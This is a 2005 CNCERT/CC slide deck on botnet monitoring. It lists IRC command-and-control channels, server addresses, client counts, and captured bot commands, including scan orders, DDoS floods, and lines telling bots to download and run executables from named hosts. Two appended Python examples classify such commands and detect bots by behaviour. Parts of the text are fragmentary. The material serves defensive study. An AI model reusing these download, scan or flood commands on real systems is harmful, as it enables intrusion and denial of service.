CNCERT/CC: Countermeasures Against Botnets
National Computer Network Emergency Response Technical Team / Coordination Center of China
Dr. Chen Mingqi, 17 November 2005, Tianjin

Outline
Part 1: Background
Part 2: Discovery and handling
Part 3: CNCERT/CC's work: monitoring results and activity patterns; countermeasures
Part 4: Analysis of real cases

1. Background
The three traditional threats to network security: viruses, Trojans and worms (Virus/Trojan/Worm); denial of service (DoS/DDoS); spam.
Hackers: a change of motive. They are now driven by financial gain rather than by the notoriety of a sensational attack or the display of skill.
CNCERT/CC, 2005-11-17
National Computer network Emergency Response technical Team/Coordination Center of China
Traditional threats: Virus/Trojan/Worm; DoS/DDoS; Spam
APWG; vendors (MS, AV companies)
2004: ISP Comcast, 888, Comcast BotNet
TrendLabs 2004 9 9 23.5
2004 10: SANS, DoS 4
2004 11: APWG, Phishing, BotNet
2004: Korgo, GaoBot, SdBot BotNet 3
Witty (CAIDA), BotNet 100
Botnet economics
3.6 cents per bot week
6 cents per bot week (September 2004 postings to SpecialHam.com, Spamforum.biz)
2004 7: Zombie 103 (BotNet), (phishing) 100
Quoted advertisement:
> 20-30k always online SOCKs4, url is de-duped and updated every 10 minutes.
> 900/weekly, Samples will be sent on request.
> Monthly payments arranged at discount prices.
> $350.00/weekly - $1,000/monthly (USD)
> Type of service: Exclusive (One slot only)
> Always Online: 5,000 - 6,000
> Updated every: 10 minutes
Discovery approaches
IRC honeypot (Honeynet Project)
IDS + IRC (863-917) bot detection
bot behaviour (DdoSVax)
IRC
Components of IRC bot control: C&C server IP and port; channel (and key); controller host. The controller authenticates with .login <pass>; bot commands include .login, .update, .download, .uninstall.
1() 2 ()
1C&C 2;
BotBOT?
CNCERT/CCTop 563919593
Example from #hotgirls (29624 clients):
ipscan s.s.s.s dcom2 86400 256 8000 s
dcombot* wormride -s -t *
download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e s (df.exe is saved as defrag32.exe)
IRC C&C servers, 2005-06-03 to 2005-06-23: 34 in total, split 18 / 5 / 4 / 2 / 2 / 1 / 1 / 1 across eight groups.
[Chart 3: Statistics of user clients of large scale botnets, 2005-06-03 to 2005-06-22]
date | bot clients observed
2005-06-03 | 48911
2005-06-08 | 57262
2005-06-10 | 50209
2005-06-13 | 41912
2005-06-15 | 17240
2005-06-17 | 22911
2005-06-20 | 20418
2005-06-22 | 15237
BOTNET
bothunter monitoring records, 2005-06-03 to 2005-06-22 (6/22/05). One row per channel: channel | C&C server IP | clients | observed activity, related channels and servers.

2005-06-03 (total 48911)
##NT## | 24.14.213.135 | 1128 | NT exploit scanning; related channels #NULLROOT#, #liquid#, #OMGLOLBBQ#
#hotgirls# | 80.191.168.20 (also 209.200.13.84) | 39084 | channel #veryhotgirls#; dcombot* wormride -s -t *; download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e -s (df.exe saved as defrag32.exe)
##pwned## | 207.105.182.101 | 2948 | ##y00##: Downloading update from http://65.75.134.170/~wxware/test/Service.exer
#Hellas | 195.204.1.132 | 5751 |

2005-06-08 (total 57262)
#fat fuckoffh00ker | 81.74.132.235 | 192 | Download http://sentinel.sp1d3y.nl/own2.exe ha.exe; NT exploit scanning; related channels #visitors tricky, #xt-nt fuckoffh00ker
#hotgirls# | 80.191.168.20 (also 209.200.13.84) | 39000 | as on 06-03 (#veryhotgirls#, dcombot* wormride -s -t *, df.exe download)
#master# | 220.151.115.232 | 6265 |
##NT## | 24.14.213.135 | 5046 | exploit scanning; #OMGLOBBQ# / #NULLROOT#: [DDOS]Flooding :(216.73.112.201) for 650 seconds
#lc-wks | 202.67.155.250 | 5640 | NT exploit scanning
#SeR 654321 | 211.221.205.58 | 1119 | port 445 scanning, FTP

2005-06-10 (total 50209)
#omgyay 0mg | 207.58.134.228 | 332 | exploit scanning
#hotgirls# | 80.191.168.20 (also 209.200.13.84) | 27014 | as above
#Brappy | 81.75.86.50 | 10271 | related channels #oG#, #hipsi sdadfasd23dfadas423, #12a asdasfGTSdzszsar3, #13b sdadfasd23dfadas423
##NT## | 24.14.213.135 | 2874 | NT exploit scanning; 222.104.230.23 #OMGLOBBQ# / #NULLROOT#: [DDOS]Flooding :(216.73.112.201 80) for 650 seconds
#lc-wks | 202.67.155.250 | 3132 | NT exploit scanning
#SeR 654321 | 211.221.205.58 | 6586 | port 445 scanning, FTP; 209.170.170.16 #For3#, #fearme#

2005-06-13 (total 41912)
#omgyay 0mg | 207.58.134.228 | 796 | exploit scanning; 67.39.199.177 and 218.56.76.142 #Gunzup Robpwns; 218.55.76.142: [UPDATE]: Downloading update from: http://www.reznzdr.com/rBot.exe and http://www.reznzdr.com/asnstolen.exe; #Gunzup Robpwns IP 61.174.215.9; #SeR 654321 IP 211.23.16.105
#hotgirls# | 80.191.168.20 (also 209.200.13.84) | 29624 | as above
##master## | 208.53.169.142 | 1133 | 207.108.170.75 and 207.167.215.35 ##master##; ##xanax##: Downloading update from: http://65.75.134.170/~wxwarez/test/Service.exe; 207.164.223.19 ##Go.DJ## / ##xanax## 208.53.169.142: [DOWNLOAD]: Link o Dns Not Trovato SUKKIAMELO!; 130.239.38.130 http://ciudad.lationl.com/777/reelay.exe
#!pwn 1337 | 66.45.255.131 | 7359 | NT exploit scanning; related channels #.b0tz elite, #spyware FBISUCK (Downloading http://s119796543.onlinehome.us/Lower.exe), #asnex (http://s119796543.onlinehome.us/tc.exe), #asn (http://s119796543.onlinehome.us/yoursite.exe), #!pwn-root (http://s119796543.onlinehome.us/tc.exe); KEYLOG: keylog: (-Micros) [Del][CTRL] (Changed window)
#SeR 654321 | 211.221.205.58 | 3000 | port 445 scanning, FTP; #For3#, #fearme#

2005-06-15 (total 17240)
#hotgirls# | 80.191.168.20 (also 209.200.13.84) | 10018 | as above
#betty | 218.207.9.11 | 4805 | DCOM and NT exploit scanning; related channels ##WHOR3Z##, ##FBOMED##; DDoS: [SYN] Flooding : (24.62.139.80) for 111111111 seconds; [DOWNLOAD] : Link o Dns Non Trovato SUKKIAMEL! : http//www.tapionirc.altervista.org/mh.exe
#ne0 | 61.167.82.194 | 151 | DCOM exploit scanning; related channels #n03, #ne0n; [DOWNLOAD]: Downloading URL : http://www.freewebs.com/matflp/undertow.exe to c:/undertow.exe -e
##master## | 207.168.215.35 | 1606 | 38.115.133.226 ##pwned## / ##pwend##; 207.164.233.19 ##y00##; 213.88.181.70 ##fatality##: [MAIN]: Removing Bot
#!pwn 1337 | 66.45.255.131 | 660 | NT exploit scanning; #.b0tz elite, #spyware FBISUCK (Downloading http://s119796543.onlinehome.us/Lower.exe, http://s119796543.onlinehome.us/tc.exe, http://s119796543.onlinehome.us/mt.exe), #asnex, #asn, #!pwn-root

2005-06-17 (total 22911)
##master## | 207.168.215.35 | 1321 | 38.115.133.226 ##pwned##: [MAIN]: Removing Bot; 207.164.233.19 ##y00## (FTP); ##fatality##
#fbomed (#betty b1xvgf) | 218.207.9.11 | 10242 | [DDoS]:Flooding: (67.159.18.197:6667) for 300 seconds; #boilerhouse flash: DCOM 135 exploit scanning; 81.230.22.51 ###LeoNarDo###; 80.100.68.87 / 80.100.22.51 #.#smash3r#.# 1211
#hotgirls | 80.191.168.20 | 6338 | 61.152.146.238 #veryhotgirls dcombot; 209.200.13.84 * wormride -s -t; 24.21.203.98, 24.184.193.250
#ne0 | 61.167.82.194 | 87 | DCOM exploit scanning; #n03, #ne0n; [DOWNLOAD]: Downloading URL : http://www.freewebs.com/matflp/undertow.exe to c:/undertow.exe -e; [DOWNLOAD]: Downloading URL : http://www.goa_irc.co.uk/wosten/new4.exe to new4.exe
#bitch fuckinghoe | 210.108.10.150 | 4923 | 211.226.12.159; related channels #blah, #bleh, #h2o pizpwna, #meh nizzle, #test fuckinghoe

2005-06-20 (total 20418)
#ne0 | 61.167.82.194 | 28 | related channels ##xdcc##, ##ownage##
#hotgirls | 209.200.13.84 | 13049 | dcombot; 61.153.201.2 #veryhotgirls; 218.22.25.142 #xotgipls
#NULLROOT | 222.104.230.41 | 295 | related channels #OMGLOLBBQ#, #kush#
#AIM# | 24.14.213.135 | 83 | AOL; #0x7f shameep
#12a asdasfGTSdzszsar3 | 211.78.141.148 | 6963 | related channels (name and key): #13b sdadfasd23dfadas423; #ago-priv trouble; #brap rotasgobrap; #brappy asd3sadasdsadgfsd; #decomp sdadfasd23dfadas423; #fbsd lovesme; #FC asdasfGTSdzszsar3; #fuk3d lovesme; #hipsi sdadfasd23dfadas423; #hound lovesme; #linux lovesme; #marissa lovesme; #n0 3nt3r; #newmsn pass; #nicole.com lovesme; #nix lovesme; #oG# unknown; #ssh lovesme; #tX lovesme

2005-06-22 (total 15237)
#fbomed FUCK3R | 218.207.9.11 | 4014 | related channels #sluTTy# p1mp3d, #betty b1xvgf, #boilerhouse flash, #eWg-BOT
#NULLROOT | 222.104.230.41 | 729 | related channels #OMGLOLBBQ#, #OMG#
#hotgirls | 209.200.13.84 | 6322 | dcombot; 61.153.201.2 #veryhotgirls
#omgyay | 66.45.249.155 | 99 | #Gunzup Robpwns, #omgyay 0mg
#12a asdasfGTSdzszsar3 | 211.78.141.148 | 4073 | same related channels as on 06-20 (#13b sdadfasd23dfadas423 through #oG# unknown)
[Chart: bot clients per channel, 2005-06-03 to 2005-06-22; series: hotgirls, betty, NULLROOT, bitch fuckinghoe, Brappy, fat fuckoffh00ker, Hellas, lc-wks, master, ne0, NT, omgyay 0mg, pwn 1337, pwned, SeR 654321, AIM, 12a asdasfGTSdzszsar3]

Additional commands captured:
2005-06-18 to 2005-06-20, #ne0 (61.167.82.194; also ##xdcc##, ##ownage##): TOPIC #ne0 : download http://goa-irc.co.uk/wosten/new3.exe 1
2005-06-20 to 2005-06-22, #fbomed (218.207.9.11): PRIVMSG #eWg-BOT :.(UPDATE): Downloading update from: http://champion.altervista.org/suk.exe
C&C server IP addresses observed, 2005-06-03 to 2005-06-22 (second column as in the source sheet):
210.108.10.150 20
211.221.205.58 5
211.226.12.159 4
218.55.76.142 2
222.104.230.23 2
207.58.134.228 1
207.105.182.101 1
207.108.170.75 1
207.164.223.19 1
207.164.233.19
207.167.215.35 35
207.168.215.35
207.58.134.228
208.53.169.142
209.170.170.16
209.200.13.84
24.14.213.135
24.184.193.250
24.21.203.98
38.115.133.226
66.45.255.131
67.39.199.177
80.191.168.20
195.204.1.132
220.151.115.232
130.239.38.130
213.88.181.70
202.67.155.250
81.74.132.235
81.75.86.50
61.167.82.194
218.207.9.11
61.152.146.238
211.78.141.148
66.45.249.155
#hotgirls# clients by date
2005-06-03 | 39084
2005-06-08 | 39000
2005-06-10 | 27014
2005-06-13 | 29624
2005-06-15 | 10018
2005-06-17 | 6338
2005-06-20 | 13049
2005-06-22 | 6322
A 150,000-bot botnet (2005-08-19 to 2005-09-19)
[Chart 2: bot clients of #diablo (C&C server 205.209.149.40), 2005-08-19 to 2005-09-19]
date | clients
2005-08-19 | 157142
2005-08-22 | 83263
2005-08-24 | 53366
2005-08-26 | 18753
2005-08-29 | 25795
2005-08-31 | 17333
2005-09-02 | 24054
2005-09-07 | 23266
2005-09-14 | 19906
2005-09-19 | 21498

Botnet channels observed 2005-06-03 to 2005-09-19 (45, alphabetical): !cz2cezka; !pwn1337; 123456789; 12aasdasfGTSdzszsar3; aabc; AIM; asn; asnFBISUCK; bbot; betty; bettyb1xvgf; bitchfuckinghoe; blah; boilerhouseflash; Brappy; CaMz-R; com; dd0s; diablo; DWdepth; Eddie; fatassfat20; fatfuckoffh00ker; fbomed; h2; hellas; hotgirls; lc-wks; Master; MP3; msn; ne0; NewBot; NT; NULLROOT; omgyay; omgyay0mg; phat; phatbot; pwned; ruff; SeR654321; sKull; staff; wubix
One controller, many channels: commands sent by the botmaster gunit!DIE@nese, 2005-08-29 12:00
PRIVMSG #asnftp :.login booties -s
PRIVMSG #nesebot :.login nesebot -s
PRIVMSG #urxbot :.login prx -s
TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s
TOPIC #.asnftp :.advscan asn1smb 100 3 0 -r -s
TOPIC #forasn :.adv.start asn 120 5 0 -r
TOPIC #phat# :.scan.startall
TOPIC #urxbot :.advscan dcom135 500 3 0 -r
Life cycle: botnet creation (Deloder/Mytob/Zotob). Capture of 2005-09-18, 09:00:
332 [botz]-96018 #ass :!upd4t3z http://peckno.site.voila.fr/win2k.exe the
[botz]-96018 67.43.*.*:6667 JOIN #suce fuck.
:r00t.expl01t3d.org 332 Suce-548836 #suce :-ntscan 254 1000 -a b
Life cycle: botnet spread. Scan commands set as channel topics:
TOPIC ##asn-new## :.advscan asn1smb 400 3 0 -r -b s
TOPIC #bitch :+advscan Asn1smbnt 199 5 0 201.x.x.x -r s
TOPIC #xdcc4 :@sadvscan asn1smb 150 5 0 201.5.x.x
TOPIC #XOwneD :!ntscan 350 1000 -a -b
TOPIC #111 :.advscan lsass_445 100 5 120 -r
332 nffe #fanta :.scan pnp 50 6000 221
332 #bot :$advscan WksSvcOth 400 5 0 221.x.x.x -b -r
332 #tvr0x :^advscan dcom135 300 5 0 -r s
332 #Rxx :.asc -S -s!.ntscan 40 5 0 -b -r -e -h!.asc PnP 40 10 0 -b -r -e -h!
332 ...#r00x %advscan dcom135 300 5 0 -r -b s
332 ...#asn :.scanall s
332 ...#.wadside :`adv.start lsass 150 6 9999 -b -r s
332 ...#.pwnt. :.xscan msass 300 5 0 -b -s
332 ...#.#smash3r#.# :.root.start msass 200 0 5 -a -r s
332 ...##scarezsql## :-scan.startall!-bot.secure -s!-scan.addnetrange x.x.x.x/16 100
Life cycle: botnet transfer (2005-09-27)
1. IRC server
2. IRC server
3. IRC server, bot
Life cycle: botnet update. Bots fetch new binaries on TOPIC or PRIVMSG commands. 2005-09-18, 08:00:
PRIVMSG #hb3 :.hell.download http://elizabethwargo.com/cannon/php1/images/duh.exe explore.exe -e
TOPIC #rooted :@sdownload http://site.voila.fr/qhzteam/asn.exe
PRIVMSG ##em :!upadfkadf http://w00tage.com/stolen2.exe stolenBot
Module changes, 2005-09-19 02:00, #NotaBot:
PRIVMSG #NotaBot :.spread.remove.module mssql
PRIVMSG #NotaBot :.spread.remove.module dcom1
PRIVMSG #NotaBot :.spread.add.module vnc_scan
PRIVMSG #NotaBot :.spread.add.module radmin_empty
Life cycle: botnet activity (spyware, scanning, DDoS)
2005-09-19 12:00: PRIVMSG #NotaBotslog :[ VNC Found ] :218.14.*.*:111111 (VNC scan result)
PRIVMSG #NotaBot: Active Modules : ms04011 ipc wins netdde veritas vnc_scan radmin_empty
2005-09-27 20:00: TOPIC ##bla :.ddos.random 81.169.*.* 80 120 (DDoS)
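Added example, not code from the slides or from CNCERT/CC: a classifier for captured C&C lines like the ones in the life-cycle captures above. It strips the IRC framing (TOPIC, PRIVMSG or the 332 topic reply), then matches the scan, DDoS, download and control grammars seen in those captures and aggregates a capture into exploit modules, drop URLs and DDoS targets. The sample lines are constructed after the captures with placeholder hosts and documentation address ranges; the advscan argument order (module, threads, delay, minutes, optional target prefix, flags) and the one-character command prefixes are my reading of the captures, not documented bot syntax.

```python
"""Classify bot commands seen on an IRC C&C channel.

Added example, not CNCERT/CC code. The grammar is read off the TOPIC and
PRIVMSG captures in the slides; the sample lines below are constructed on
that pattern with placeholder hosts and addresses.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Generic IRC framing: [:prefix] <COMMAND|3-digit numeric> <params> [:trailing]
IRC_RE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?(?P<cmd>[A-Z]+|\d{3})\s+(?P<params>[^:]*?)\s*(?::(?P<trailing>.*))?$"
)

# Bot verbs carry a one-character prefix (. ! @ - + ^ % ` $); some bots add a
# letter after it ("@sadvscan"), which the lazy \S*? absorbs.
PREFIX = r"^[.!@\-+^%`$]+\S*?"

# Assumed argument order: <module> <threads> <delay> <minutes> [<range>] [flags]
SCAN_RE = re.compile(
    PREFIX + r"(?P<verb>advscan|adv\.start|root\.start|xscan|ntscan)\s+"
    r"(?:(?P<module>[A-Za-z]\w*)\s+)?"
    r"(?P<threads>\d+)\s+(?P<delay>\d+)(?:\s+(?P<minutes>\d+))?"
    r"(?:\s+(?P<range>\d+(?:\.(?:\d+|x|\*)){3}))?"
    r"(?P<flags>(?:\s+-?[a-z])*)\s*$",
    re.I,
)
DDOS_RE = re.compile(
    r"(?:ddos\.\w+|\[(?:DDOS|SYN)\]\s*:?\s*Flooding\s*:?)\s*\(?"
    r"(?P<target>[\d.*x]+(?::\d+)?)\)?(?:\s+(?P<port>\d+))?\s*(?:for\s+)?(?P<seconds>\d+)",
    re.I,
)
DOWNLOAD_RE = re.compile(
    r"(?P<url>https?://[^\s;]+)(?:\s+(?:to\s+)?(?P<dest>[A-Za-z]:[\\/]\S+|\S+\.exe))?",
    re.I,
)


@dataclass
class BotCommand:
    kind: str                  # scan | ddos | download | control | report
    channel: Optional[str]
    detail: dict = field(default_factory=dict)


def classify(line: str) -> Optional[BotCommand]:
    """Return the command a single captured IRC line carries, or None."""
    m = IRC_RE.match(line.strip())
    if not m or m.group("trailing") is None:
        return None
    channel = next((p for p in m.group("params").split() if p.startswith("#")), None)
    text = m.group("trailing").strip()
    if s := SCAN_RE.match(text):
        d = {k: v for k, v in s.groupdict().items() if v}
        for k in ("threads", "delay", "minutes"):
            if k in d:
                d[k] = int(d[k])
        d["flags"] = d.get("flags", "").split()
        return BotCommand("scan", channel, d)
    if d := DDOS_RE.search(text):
        return BotCommand("ddos", channel,
                          {"target": d["target"], "port": d["port"], "seconds": int(d["seconds"])})
    if d := DOWNLOAD_RE.search(text):
        return BotCommand("download", channel, {"url": d["url"].rstrip("."), "dest": d["dest"]})
    if re.match(r"^[.!@\-+^%`$]", text):
        return BotCommand("control", channel, {"verb": text.split()[0].lstrip(".!@-+^%`$")})
    return BotCommand("report", channel, {"text": text})


def summarize(lines):
    """Aggregate a capture: counts per kind, exploit modules, drop URLs, DDoS targets."""
    out = {"counts": {}, "modules": set(), "urls": [], "ddos_targets": [], "channels": set()}
    for line in lines:
        c = classify(line)
        if c is None:
            continue
        out["counts"][c.kind] = out["counts"].get(c.kind, 0) + 1
        if c.channel:
            out["channels"].add(c.channel)
        if c.kind == "scan" and "module" in c.detail:
            out["modules"].add(c.detail["module"].lower())
        elif c.kind == "download":
            out["urls"].append(c.detail["url"])
        elif c.kind == "ddos":
            out["ddos_targets"].append(c.detail["target"])
    return out


# Constructed sample capture (placeholder hosts; 192.0.2.0/24 and 198.51.100.0/24 are
# documentation ranges), modelled on the TOPIC/PRIVMSG lines shown in the slides.
SAMPLE = [
    "TOPIC #rBot :.advscan lsass 200 5 0 -r -s",
    "TOPIC #bitch :+advscan Asn1smbnt 199 5 0 201.x.x.x -r s",
    "TOPIC #xdcc4 :@sadvscan asn1smb 150 5 0 201.5.x.x",
    "TOPIC #XOwneD :!ntscan 350 1000 -a -b",
    "TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s",
    ":gunit!DIE@nese PRIVMSG #urxbot :.login prx -s",
    "PRIVMSG #NotaBot :.spread.add.module vnc_scan",
    "TOPIC #rooted :@sdownload http://dropper.example/asn.exe",
    "PRIVMSG #hb3 :.hell.download http://dropper.example/duh.exe explore.exe -e",
    "332 nick #ass :!upd4t3z http://cdn.example/win2k.exe the",
    "PRIVMSG #NULLROOT :[DDOS]Flooding :(192.0.2.10) for 650 seconds",
    "PRIVMSG #fbomed :[DDoS]:Flooding: (192.0.2.20:6667) for 300 seconds",
    "TOPIC ##bla :.ddos.random 198.51.100.* 80 120",
    "PRIVMSG #NotaBotslog :[ VNC Found ] :198.51.100.7:5900",
    "PRIVMSG #phatty :keylog: (-Micros) [Del][CTRL] (Changed window)",
]

if __name__ == "__main__":
    for line in SAMPLE:
        c = classify(line)
        print(f"{c.kind:8} {c.channel or '-':14} {c.detail}")
    print(summarize(SAMPLE)["counts"])
```

Running the block prints one classified row per line. summarize() is the shape of aggregate a monitoring job would feed into per-channel tables like the ones above, and the module set (lsass, asn1smb, dcom135, ...) tells a responder which vulnerabilities the botnet is spreading through at that moment, which is what decides the patch advisory to send to the affected ISP.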
Life cycle: botnet decease
1. C&C servers: DDNS / DNS
2. C&C server, bot
3. bot
4.
5. (.remove / .uninstall)
6. bot
CNCERT/CC work
1. 2004-12: 863-917, IRC BotNet
2. IRC BotNet; 2005-07: honeypot
3. BotNet
4. BotNet, bot
5. bot
6. bot
DDOS
1
2DDOSBotNet
Case study: BKDR_VB.CQ
\urlHTTPSMTP
IRC C&C server domain names:
anthony.ipv6.usr.aswind.com
peter.freehost.aswind.net
carlyle.dns2go.aswind.net
khond.vip.vhost.ourmidi.com
lamen.vhost.ourmidi.com
massuse.ipv6.free.ourmidi.net
bruce.free.ourmidi.net
john.usr.aswind.com
C&C server IP addresses and ports:
216.152.*.* 6667
212.204.*.* 6667
64.12.*.* 6667
207.68.*.* 6667
61.197.*.* 8000
218.157.*.* 443
221.146.*.* 554
219.153.*.* 8000
202.108.*.* IP
()
BotNet
12106000080003712
IP 60.2.*.* (ADSL)
()() 1171641 IPBKDR_VB.CQ156120
215521 (2004-12-13 to 2005-01-10)
()
CNCERT/CC
()
() BotNet 1CNCERT http://www.cert.org.cn/articles/tools/common/2004123022037.shtml 2
()3
rasinf.exe,ipxsrv.exeipxsrv.exe,QQ,IEipxsrv.exe, msapp.exerasinf.exe, rasinf.exeIPCKuang2kuang2(k2.exe)kuang2msapp.exe.1200223200410 Botnet
1. C&C server
2. Bot
3. C&C server
4.
5. botnet
CNCERT/CC
WEBSITE: WWW.ORG.CN
TEL: 8299 0999; +86-10-8299 1000
EMAIL: [email protected]
BotNet2004BotNetSpamDDosBotBotnet BotNet200420033
DDoSIdentity theftbotbotHoneywallbot200411200531HoneyWall1mwcollect[8],18030550080020041120051406Ddos179[4]
Detection heuristics:
1) fast joining bots: bots join the IRC channel in bursts
2) long standing connection: bots stay connected and are not talkative; ping/pong (DdoSVax[5])
Bot IDS; IRC IDS; IRC RFC; socks v4 server
IDS signature example: TOPIC #rBot :.advscan lsass 200 5 0 -r s
a -> TOPIC #rBot :.advscan lsass 200 5 0 -r s\n
b -> TOPIC #rBot :.advscan lsass 200 5 0 -r s\n
c) Botnet, bot
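Added example, not code from the slides or from CNCERT/CC: the two behavioural heuristics named in the notes above, fast-joining bots and long-standing connections that never talk apart from ping/pong, applied to a constructed IRC connection log. The thresholds (20 joins from distinct hosts within 60 s; an hour connected with no PRIVMSG) and the event record format are assumptions; the addresses are documentation ranges.

```python
"""Behavioural heuristics for spotting IRC bot clients in connection logs.

Added example, not CNCERT/CC code. It implements the heuristics the notes
name (bursts of fast-joining clients, and long-standing connections that stay
silent apart from PING/PONG keep-alives) over a constructed event log. The
thresholds are assumptions, not figures from the slides.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: int          # seconds since the capture started
    host: str        # client address
    kind: str        # CONNECT | JOIN | PRIVMSG | PING | PONG | QUIT
    channel: str = ""


def fast_joining_channels(events, window=60, min_joins=20):
    """Channels that saw JOINs from >= min_joins distinct hosts within any `window` seconds."""
    joins = defaultdict(list)
    for e in events:
        if e.kind == "JOIN":
            joins[e.channel].append((e.ts, e.host))
    flagged = {}
    for chan, lst in joins.items():
        lst.sort()
        best, lo = 0, 0
        for hi in range(len(lst)):
            while lst[hi][0] - lst[lo][0] > window:   # slide the window's left edge
                lo += 1
            best = max(best, len({h for _, h in lst[lo:hi + 1]}))
        if best >= min_joins:
            flagged[chan] = best
    return flagged


def silent_long_lived_hosts(events, min_duration=3600, max_messages=0):
    """Hosts seen for >= min_duration seconds that sent <= max_messages PRIVMSGs.

    PING/PONG traffic is deliberately not counted as talking: a bot answers the
    server's keep-alives and otherwise waits for orders.
    """
    first, last, msgs = {}, {}, defaultdict(int)
    for e in events:
        first.setdefault(e.host, e.ts)
        last[e.host] = max(last.get(e.host, e.ts), e.ts)
        if e.kind == "PRIVMSG":
            msgs[e.host] += 1
    return sorted(h for h in first if last[h] - first[h] >= min_duration and msgs[h] <= max_messages)


def detect(events):
    return {
        "fast_joining": fast_joining_channels(events),
        "silent_long_lived": silent_long_lived_hosts(events),
    }


def build_sample():
    """Constructed log: 25 bots plus 3 human users (documentation address ranges)."""
    ev = []
    # 25 bots join #rBot within 30 s and then only answer PINGs for two hours.
    for i in range(25):
        host = f"198.51.100.{i + 1}"
        ev.append(Event(i, host, "CONNECT"))
        ev.append(Event(i + 1, host, "JOIN", "#rBot"))
        for t in range(120, 7201, 120):
            ev.append(Event(i + t, host, "PONG"))
    # Three users drift into #linux at different times, chat, and leave after 90 min.
    for j, host in enumerate(["203.0.113.5", "203.0.113.9", "203.0.113.14"]):
        base = 600 * j
        ev.append(Event(base, host, "CONNECT"))
        ev.append(Event(base + 5, host, "JOIN", "#linux"))
        for t in range(60, 5400, 300):
            ev.append(Event(base + t, host, "PRIVMSG", "#linux"))
        ev.append(Event(base + 5400, host, "QUIT"))
    return sorted(ev, key=lambda e: e.ts)


if __name__ == "__main__":
    result = detect(build_sample())
    print("fast-joining channels:", result["fast_joining"])
    print("silent long-lived hosts:", len(result["silent_long_lived"]))
```

The PONG events stay in the log but are never counted as talk, which is what separates the 25 constructed bots from the three users who also stay connected for more than an hour; raising max_messages makes the second heuristic flag the users too, so the silence criterion, not the duration, carries the distinction.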